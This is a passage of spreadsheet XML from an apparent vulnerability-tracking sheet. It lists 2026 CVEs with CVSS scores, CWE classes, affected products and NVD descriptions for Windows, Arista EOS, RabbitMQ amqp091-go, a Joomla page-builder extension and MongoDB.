      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K806"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806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr"/>
      <c r="Q806" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K807" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr"/>
      <c r="Q807" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K808"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808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr"/>
      <c r="Q808" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K809"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809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr"/>
      <c r="Q809" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K810"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810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr"/>
      <c r="Q810" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K811" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr"/>
      <c r="Q811" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73435</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr"/>
      <c r="Q812" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Open Shortest Path First version 2 (OSPFv2) configured, a specially crafted OSPFv2 packet from an unauthenticated attacker on the same broadcast segment, with OSPFv2 authentication configured can cause adjacency flapping and packet loss. The disruption can affect routing across the broader OSPF domain.</t>
        </is>
      </c>
      <c r="S812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73435</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73438</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr"/>
      <c r="Q813" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Open Shortest Path First version 3 (OSPFv3) configured, an unauthenticated attacker on the same OSPFv3 broadcast domain can send a specially crafted set of packets that can cause the Ospf3 agent to restart unexpectedly. The crash results in the loss of all OSPFv3 adjacencies on the affected device and may disrupt routing across the broader OSPF domain until the agent recovers.
This issue was reported externally by Dravanet Inc., and Arista is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73438</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73446</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr"/>
      <c r="Q814" s="5" t="inlineStr">
        <is>
          <t>CWE-696</t>
        </is>
      </c>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IS-IS configured on a broadcast interface, an unauthenticated attacker can send a crafted IS-IS Hello Protocol Data Unit (PDU) that causes the device to tear down an established IS-IS adjacency. This may result in traffic disruption and loss of IP reachability for prefixes advertised through that adjacency.</t>
        </is>
      </c>
      <c r="S814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73446</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73450</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr"/>
      <c r="Q815" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with MLAG Dual Primary Detection configured, an unauthenticated attacker with access to the Dual Primary Detection network segment can send specially crafted packets to interfere with the dual-primary state. If the MLAG primary switch fails while these packets are present, the secondary switch incorrectly concludes it is in a dual-primary condition and err-disables its interfaces, leading to a traffic interruption.</t>
        </is>
      </c>
      <c r="S815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73450</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73459</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr"/>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr"/>
      <c r="Q816" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IS-IS configured, an unauthenticated attacker who can inject a specially crafted IS-IS LSP PDU can cause the legitimate LSP to be unexpectedly purged from the IS-IS link-state database. This may result in traffic loss.</t>
        </is>
      </c>
      <c r="S816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73459</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73460</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr"/>
      <c r="Q817" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IS-IS graceful restart enabled, an unauthenticated attacker who can inject a malformed IS-IS LSP PDU packet can cause the IS-IS graceful restart procedure to terminate prematurely. This may result in traffic loss following a restart event.</t>
        </is>
      </c>
      <c r="S817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73460</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77407</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="inlineStr"/>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr"/>
      <c r="Q818" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, PlainAuth values defined in auth.go retain passwords as exported plaintext fields in Connection.Config.SASL after a successful PLAIN authentication handshake. The Connection.openComplete method in connection.go does not clear those values. Code with access to the Connection object, including reflective loggers, application performance monitoring agents, debugging utilities, and panic handlers, can traverse the configuration and expose the credentials to logs or state captures. The credential remains available for the lifetime of the connection instead of being cleared after authentication. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77407</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K819"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819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K820" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr"/>
      <c r="Q820" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81564</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr"/>
      <c r="Q821" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Missing Directory Confinement in Media Rename Allowing Arbitrary File Rename in SP Page Builder (Free and Pro) 4.0.0 - 6.9.0 - The media rename task applied neither of the directory boundary checks used by the folder operations in the same controller, and its validation guard required only that either a media record exist for the supplied identifier or that the supplied path be present in #__spmedia, rather than both. The identifier and the path were consequently never checked against one another, so any valid media identifier could be paired with an unrelated filesystem path, and the STR input filter left traversal sequences intact. An attacker could rename files elsewhere in the installation, including renaming configuration.php to take the site offline.</t>
        </is>
      </c>
      <c r="S821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81564</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K822" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr"/>
      <c r="Q822" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="S822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
